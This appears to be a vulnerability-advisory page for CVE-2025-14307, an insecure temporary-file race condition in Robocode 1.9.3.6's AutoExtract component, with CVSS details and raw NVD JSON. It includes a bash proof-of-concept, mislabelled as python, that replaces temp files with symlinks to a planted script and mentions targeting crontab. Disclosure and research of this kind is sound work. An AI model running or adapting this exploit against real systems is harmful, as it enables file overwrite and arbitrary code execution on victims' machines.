Security Vulnerability Report
中文
CVE-2025-14307 CVSS 8.1 HIGH

CVE-2025-14307

Published: 2025-12-09 16:17:39
Last Modified: 2026-01-05 16:19:08
Source: [email protected]

Description

An insecure temporary file creation vulnerability exists in the AutoExtract component of Robocode version 1.9.3.6. The createTempFile method fails to securely create temporary files, allowing attackers to exploit race conditions and potentially execute arbitrary code or overwrite critical files. This vulnerability can be exploited by manipulating the temporary file creation process, leading to potential unauthorized actions.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:robocode:robocode:1.9.3.6:*:*:*:*:*:*:* - VULNERABLE
Robocode < 1.9.3.6 (affected)
Robocode 1.9.3.6 (confirmed vulnerable)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-14307 PoC - TOCTOU Race Condition in Robocode AutoExtract # Target: Robocode 1.9.3.6 AutoExtract createTempFile() TARGET_DIR="$HOME/.robocode/config" MALICIOUS_FILE="/tmp/malicious_robot.jar" BACKUP_FILE="/tmp/backup_crontab" # Create malicious JAR payload echo "Creating malicious payload..." cat > /tmp/malicious.sh << 'EOF' #!/bin/bash echo "Malicious code executed!" >> /tmp/pwned.txt EOF chmod +x /tmp/malicious.sh # Monitor for temporary file creation echo "Monitoring for temp file creation..." while true; do # Check for newly created temp files in Robocode directory for file in $(find "$TARGET_DIR" -name 'tmp*' -type f 2>/dev/null); do echo "Found temp file: $file" # Race condition: quickly replace with symlink # This PoC demonstrates the vulnerability concept # In real attack, attacker would link to crontab or other sensitive files # Backup original if exists if [ -f "$file" ]; then cp "$file" "$BACKUP_FILE" fi # Create symlink to sensitive location (example: /tmp/pwned) ln -sf /tmp/malicious.sh "$file" echo "Symlink created, waiting for file write..." sleep 0.1 # Restore original if [ -f "$BACKUP_FILE" ]; then cp "$BACKUP_FILE" "$file" fi break 2 done sleep 0.5 done echo "PoC execution completed. Check /tmp/pwned.txt if exploitation succeeded."

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14307", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:38.640", "lastModified": "2026-01-05T16:19:07.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An insecure temporary file creation vulnerability exists in the AutoExtract component of Robocode version 1.9.3.6. The createTempFile method fails to securely create temporary files, allowing attackers to exploit race conditions and potentially execute arbitrary code or overwrite critical files. This vulnerability can be exploited by manipulating the temporary file creation process, leading to potential unauthorized actions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:D/RE:M/U:Red", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:robocode:robocode:1.9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "838ABFF5-2DF6-4A7E-933B-179FB2FC1AE0"}]}]}], "references": [{"url": "https://github.com/robo-code/robocode/pull/68", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.